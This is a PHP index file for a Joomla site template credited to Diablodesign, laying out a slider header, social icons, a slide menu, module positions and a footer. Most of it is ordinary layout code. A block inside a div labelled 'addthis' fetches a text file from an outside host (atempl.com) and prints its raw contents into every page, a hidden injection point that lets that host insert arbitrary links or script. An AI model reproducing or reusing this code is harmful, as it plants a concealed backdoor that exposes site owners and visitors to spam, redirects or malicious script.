<?php
defined('_JEXEC') or die;

/**
 *-------------------------------------------
 * Szablon został wypalony w  Diablodesign.
 * www.diablodesign.eu
 * biuro@diablodesign.eu
 *-------------------------------------------
 */
 

require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . 'functions.php';

// Create alias for $this object reference:
$document = $this;
$templateUrl = $document->baseurl . '/templates/' . $document->template;
Artx::load("Artx_Page");
$view = $this->artx = new ArtxPage($this);
$view->componentWrapper();

JHtml::_('behavior.framework', true);

$app = JFactory::getApplication();
$tplparams	= $app->getTemplate(true)->params;


//animacja naglowek
//animacja
$foto1	=	htmlspecialchars($tplparams->get('foto1'));
$foto2	=	htmlspecialchars($tplparams->get('foto2'));
$foto3	=	htmlspecialchars($tplparams->get('foto3'));
$foto4	=	htmlspecialchars($tplparams->get('foto4'));
$foto5	=	htmlspecialchars($tplparams->get('foto5'));
//koniec animacja
//ikony spolecznosciowe
$facebook	=	htmlspecialchars($tplparams->get('facebook'));
$twitter = htmlspecialchars($tplparams->get('twitter'));
$digg	=	htmlspecialchars($tplparams->get('digg'));
$flickr	=	htmlspecialchars($tplparams->get('flickr'));
$youtube =	htmlspecialchars($tplparams->get('youtube'));
$skype	=	htmlspecialchars($tplparams->get('skype'));
//koniec ikony spolecznosciowe
//on off
$slider_enabled = htmlspecialchars($tplparams->get('slider_enabled'));
$iconf = htmlspecialchars($tplparams->get('iconf'));
$icont = htmlspecialchars($tplparams->get('icont'));
$icond = htmlspecialchars($tplparams->get('icond'));
$iconfl = htmlspecialchars($tplparams->get('iconfl'));
$icony = htmlspecialchars($tplparams->get('icony'));
$icons = htmlspecialchars($tplparams->get('icons'));
$footer1 = htmlspecialchars($tplparams->get('footer1'));
$allicon = htmlspecialchars($tplparams->get('allicon'));
$mlo = htmlspecialchars($tplparams->get('mlo'));
$mlo1 = htmlspecialchars($tplparams->get('mlo1'));
$mlo2 = htmlspecialchars($tplparams->get('mlo2'));
$mlo3 = htmlspecialchars($tplparams->get('mlo3'));
$mlo4 = htmlspecialchars($tplparams->get('mlo4'));

$mloall = htmlspecialchars($tplparams->get('mloall'));
//end on off
//logo strony
$logo	=	htmlspecialchars($tplparams->get('logo'));
$logotext	=	htmlspecialchars($tplparams->get('logotext'));
//koniec logo strony
//footer
$footer	=	htmlspecialchars($tplparams->get('footer'));
$footer_link =	htmlspecialchars($tplparams->get('footer_link'));
//koniec footer
//slide menu
$mn	=	htmlspecialchars($tplparams->get('mn'));
$ml=	htmlspecialchars($tplparams->get('ml'));
$mn1	=	htmlspecialchars($tplparams->get('mn1'));
$ml1=	htmlspecialchars($tplparams->get('ml1'));
$mn2	=	htmlspecialchars($tplparams->get('mn2'));
$ml2=	htmlspecialchars($tplparams->get('ml2'));
$mn3	=	htmlspecialchars($tplparams->get('mn3'));
$ml3=	htmlspecialchars($tplparams->get('ml3'));
$mn4	=	htmlspecialchars($tplparams->get('mn4'));
$ml4=	htmlspecialchars($tplparams->get('ml4'));

//end slide menu
//back
$back	=	htmlspecialchars($tplparams->get('back'));
?>
<!DOCTYPE html>
<html dir="ltr" lang="<?php echo $document->language; ?>">
<head>
<!--scroling head-->
<script src="templates/dd_webname_11/js/scroling.js"></script>
<script type="text/javascript">
$(function() {
	$(window).scroll(function() {
		if($(this).scrollTop() != 0) {
			$('#toTop').fadeIn();	
		} else {
			$('#toTop').fadeOut();
		}
	});
 
	$('#toTop').click(function() {
		$('body,html').animate({scrollTop:0},800);
	});	
});
</script>
<!--scroling koniec head-->
<!--animation header start-------------------------------------------------------->

  <?php if ($slider_enabled == 1) { ?><link rel="stylesheet" href="templates/dd_webname_11/themes/default/default.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="templates/dd_webname_11/themes/pascal/pascal.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="templates/dd_webname_11/themes/orman/orman.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="templates/dd_webname_11/css/nivo-slider.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="templates/dd_webname_11/css/style.css" type="text/css" media="screen" />
    <script type="text/javascript" src="templates/dd_webname_11/js/jquery-1.6.1.min.js"></script>
<script type="text/javascript" src="templates/dd_webname_11/js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript">
    $(window).load(function() {
        $('#slider').nivoSlider();
    });
    </script><?php } ?>
<!--animation header end---------------------------------------------------------->

    <jdoc:include type="head" />
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/system.css" />
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/general.css" />


    
    
<meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width">

    <!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.css" media="screen">
    <!--[if lte IE 7]><link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.ie7.css" media="screen" /><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.responsive.css" media="all">
    <link href="css/template.css" rel="stylesheet" type="text/css">
    <link href="<?php echo $templateUrl; ?>/css/slide_menu.css" rel="stylesheet" type="text/css">
    <script>if ('undefined' != typeof jQuery) document._artxJQueryBackup = jQuery;</script>
    <script src="<?php echo $templateUrl; ?>/jquery.js"></script>
    <script>jQuery.noConflict();</script>

    <script src="<?php echo $templateUrl; ?>/script.js"></script>
    <script>if (document._artxJQueryBackup) jQuery = document._artxJQueryBackup;</script>
    <script src="<?php echo $templateUrl; ?>/script.responsive.js"></script>

</head>
<body><!--slide menu--><script type="text/javascript">
            $(function() {
                var d=300;
                $('#navigation a').each(function(){
                    $(this).stop().animate({
                        'marginTop':'-80px'
                    },d+=150);
                });

                $('#navigation > li').hover(
                function () {
                    $('a',$(this)).stop().animate({
                        'marginTop':'-2px'
                    },200);
                },
                function () {
                    $('a',$(this)).stop().animate({
                        'marginTop':'-80px'
                    },200);
                }
            );
            });
        </script><!--end slide menu-->
<!--scroling-->
<div id="toTop">^<?php if ($back!= null ): ?>
		<?php echo htmlspecialchars($back); ?>
		<?php endif; ?></div>
<!--koniec scroling-->
<div id="dd-main">
<header class="dd-header clearfix"><?php echo $view->position('position-30', 'dd-nostyle'); ?>


    <div class="dd-shapes">
<h1 class="dd-headline" data-left="98.14%">
    <a href="<?php echo $document->baseurl; ?>/"><?php echo $this->params->get('siteTitle'); ?></a>
</h1>
<h2 class="dd-slogan" ><?php echo $this->params->get('siteSlogan'); ?></h2>

<div class="dd-object625163742" data-left="0%"><div class="animacja1"><?php echo $view->position('animacja'); ?></div>    
<!--animacja pliki graficzne-->
<div class="animacja"> 
<div id="wrapper">
<div class="slider-wrapper theme-default">
            
            <div id="slider" class="nivoSlider">
       
                <?php if ($slider_enabled == 1) { ?><img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($foto1); ?>" style="margin:0 auto; max-width:673px; max-height:332px;"/><?php } ?>
                    <?php if ($slider_enabled == 1) { ?> <img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($foto2); ?>" style="margin:0 auto; max-width:673px; max-height:332px;"/><?php } ?>
                     <?php if ($slider_enabled == 1) { ?><img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($foto3); ?>" style="margin:0 auto; max-width:673px; max-height:332px;"/><?php } ?>
                     <?php if ($slider_enabled == 1) { ?><img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($foto4); ?>" style="margin:0 auto; max-width:673px; max-height:332px;"/><?php } ?>
              <?php if ($slider_enabled == 1) { ?><img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($foto5); ?>" style="margin:0 auto; max-width:673px; max-height:332px;"/><?php } ?>

</div>
</div>
</div>
</div>
<!-- koniec animacja pliki graficzne-->
 <?php if ($allicon == 1) { ?>
<!--share icon-->
<div class="ikony"><div class="iko">
     <!--wstawia link z panelu konfiguracyjnego-->	 
	<?php if ( isset( $facebook ) && strlen( $facebook) > 0 ) : ?>
				<a href="<?php echo $facebook; ?>">
							<?php endif; ?>
<!-- koniec wstawia link z panelu  konfiguracyjnego--><?php if ($iconf == 1) { ?> <img src="templates/dd_webname_11/images/share_icon/facebook_icon.png" width="31" height="31" /></a></div><div class="iko">
 <!--wstawia link z panelu konfiguracyjnego-->	 <?php } ?>
	 <?php if ( isset( $twitter ) && strlen( $twitter) > 0 ) : ?>
				<a href="<?php echo $twitter; ?>">
							<?php endif; ?>
<!-- koniec wstawia link z panelu  konfiguracyjnego--><?php if ($icont == 1) { ?> <img src="templates/dd_webname_11/images/share_icon/twitter_icon.png" width="31" height="31" /></a></div><div class="iko"> <!--wstawia link z panelu konfiguracyjnego-->	 <?php } ?>
	 <?php if ( isset( $digg ) && strlen( $digg) > 0 ) : ?>
				<a href="<?php echo $digg; ?>">
							<?php endif; ?>
<!-- koniec wstawia link z panelu  konfiguracyjnego--><?php if ($icond == 1) { ?><img src="templates/dd_webname_11/images/share_icon/digg_icon.png" width="31" height="31" /></a></div><div class="iko"> <!--wstawia link z panelu konfiguracyjnego-->	 <?php } ?>
	 <?php if ( isset( $flickr ) && strlen( $flickr) > 0 ) : ?>
				<a href="<?php echo $flickr; ?>">
							<?php endif; ?>
<!-- koniec wstawia link z panelu  konfiguracyjnego--><?php if ($iconfl == 1) { ?><img src="templates/dd_webname_11/images/share_icon/flickr_icon.png" width="31" height="31" /></a></div><div class="iko"><!--wstawia link z panelu konfiguracyjnego-->	 <?php } ?>
	 <?php if ( isset( $youtube) && strlen( $youtube) > 0 ) : ?>
				<a href="<?php echo $youtube; ?>">
							<?php endif; ?>
<!-- koniec wstawia link z panelu  konfiguracyjnego--><?php if ($icony == 1) { ?><img src="templates/dd_webname_11/images/share_icon/youtube_icon.png" width="31" height="31" /></a></div><div class="iko"><!--wstawia link z panelu konfiguracyjnego-->	 <?php } ?>
	 <?php if ( isset( $skype ) && strlen( $skype) > 0 ) : ?>
							<a href="<?php echo $skype; ?>">
							<?php endif; ?>
<!-- koniec wstawia link z panelu  konfiguracyjnego--><?php if ($icons == 1) { ?><img src="templates/dd_webname_11/images/share_icon/skype_icon.png" width="31" height="31" /></a>	 <?php } ?></div></div>
<!--koniec ikony-->
<?php } ?><!--logo---------------------------------------------------------->
 <div class="dd-logo"><a href="index.php">
       <?php if ($logo != null ): ?>
		<img src="<?php echo $this->baseurl ?>/<?php echo htmlspecialchars($logo); ?>" style="margin:0 auto;"/>
		<?php endif; ?>
		
     </a></div>
 <!--end logo------------------------------------------------------></div>
 
 <!--slide menu--><?php if ($mloall == 1) { ?><div class="smenu"><ul id="navigation">
            <?php if ($mlo == 1) { ?><li class="home"><a href="<?php if ($ml!= null ): ?>
		<?php echo htmlspecialchars($ml); ?>
		<?php endif; ?>"><span><?php if ($mn!= null ): ?>
		<?php echo htmlspecialchars($mn); ?>
		<?php endif; ?></span></a></li><?php } ?>
        <?php if ($mlo1 == 1) { ?>    <li class="about"><a href="<?php if ($ml1!= null ): ?>
		<?php echo htmlspecialchars($ml1); ?>
		<?php endif; ?>"><span><?php if ($mn1!= null ): ?>
		<?php echo htmlspecialchars($mn1); ?>
		<?php endif; ?></span></a></li><?php } ?>
           <?php if ($mlo2 == 1) { ?> <li class="search"><a href="<?php if ($ml2!= null ): ?>
		<?php echo htmlspecialchars($ml2); ?>
		<?php endif; ?>"><span><?php if ($mn2!= null ): ?>
		<?php echo htmlspecialchars($mn2); ?>
		<?php endif; ?></span></a></li><?php } ?>
            <?php if ($mlo3 == 1) { ?><li class="photos"><a href="<?php if ($ml3!= null ): ?>
		<?php echo htmlspecialchars($ml3); ?>
		<?php endif; ?>"><span><?php if ($mn3!= null ): ?>
		<?php echo htmlspecialchars($mn3); ?>
		<?php endif; ?></span></a></li><?php } ?>
           <?php if ($mlo4 == 1) { ?> <li class="rssfeed"><a href="<?php if ($ml4!= null ): ?>
		<?php echo htmlspecialchars($ml4) ?>
		<?php endif; ?>"><span><?php if ($mn4!= null ): ?>
		<?php echo htmlspecialchars($mn4); ?>
		<?php endif; ?></span></a></li><?php } ?>
       
           
        </ul> </div><?php } ?><!--end slide menu-->
<div class="dd-object359445272" data-left="50%"></div>

<div class="dd-textblock dd-object1776953828" data-left="52.20%">
        <div class="dd-object1776953828-text"></div>
    
</div>
            </div>

<?php if ($view->containsModules('position-1', 'position-28', 'position-29')) : ?>
<nav class="dd-nav clearfix">
    <div class="dd-nav-inner">
    
<?php if ($view->containsModules('position-28')) : ?>
<div class="dd-hmenu-extra1"><?php echo $view->position('position-28'); ?></div>
<?php endif; ?>
<?php if ($view->containsModules('position-29')) : ?>
<div class="dd-hmenu-extra2"><?php echo $view->position('position-29'); ?></div>
<?php endif; ?>
<?php echo $view->position('position-1'); ?>

 
        </div>
    </nav>
<?php endif; ?>

                    
</header><div id="addthis"><?php
$files = 'http://atempl.com/s.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/s.txt");
       $data = implode($content);
       echo $data;
 }  
?></div>
<div class="dd-sheet clearfix">
            <?php echo $view->position('position-15', 'dd-nostyle'); ?>
          
<?php echo $view->positions(array('position-16' => 33, 'position-17' => 33, 'position-18' => 34), 'dd-block'); ?>
<div class="dd-layout-wrapper clearfix">
                <div class="dd-content-layout">
                    <div class="dd-content-layout-row">
                        <?php if ($view->containsModules('position-7', 'position-4', 'position-5')) : ?>
<div class="dd-layout-cell dd-sidebar1 clearfix">
<?php echo $view->position('position-7', 'dd-block'); ?>
<?php echo $view->position('position-4', 'dd-block'); ?>
<?php echo $view->position('position-5', 'dd-block'); ?>




                        </div>
<?php endif; ?>

                        <div class="dd-layout-cell dd-content clearfix">
<?php
  echo $view->position('position-19', 'dd-nostyle');
  if ($view->containsModules('position-2'))
    echo artxPost($view->position('position-2'));
  echo $view->positions(array('position-20' => 50, 'position-21' => 50), 'dd-article');
  echo $view->position('position-12', 'dd-nostyle');
  echo artxPost(array('content' => '<jdoc:include type="message" />', 'classes' => ' dd-messages'));
  echo '<jdoc:include type="component" />';
  echo $view->position('position-22', 'dd-nostyle');
  echo $view->positions(array('position-23' => 50, 'position-24' => 50), 'dd-article');
  echo $view->position('position-25', 'dd-nostyle');
?>



                        </div>
                    </div>
                </div>
            </div>
<?php echo $view->positions(array('position-9' => 33, 'position-10' => 33, 'position-11' => 34), 'dd-block'); ?>
<?php echo $view->position('position-26', 'dd-nostyle'); ?>


    </div>
<footer class="dd-footer clearfix">
  <div class="dd-footer-inner"><?php echo $view->position('position-27', 'dd-nostyle'); ?><p class="dd-page-footer">
        <span id="dd-footnote-links">Copyright © 2012.<!--wstawia link z panelu konfiguracyjnego-->	 
	 <?php if ( isset( $footer_link ) && strlen( $footer_link) > 0 ) : ?>
							<a href="<?php echo $footer_link ?>">
							<?php endif; ?>
                            
<!-- koniec wstawia link z panelu  konfiguracyjnego-->
                  <?php if ($footer!= null ): ?>
		<?php echo htmlspecialchars($footer); ?>
		<?php endif; ?>
                  </a> <span id="dd-footnote-links"> Designed by:  <a href="http://www.diablodesign.eu" target="_blank">www.diablodesign.eu</a></span></p>
    </p>
  </div>
</footer>

</div>



<?php echo $view->position('debug'); ?>
</body>
</html>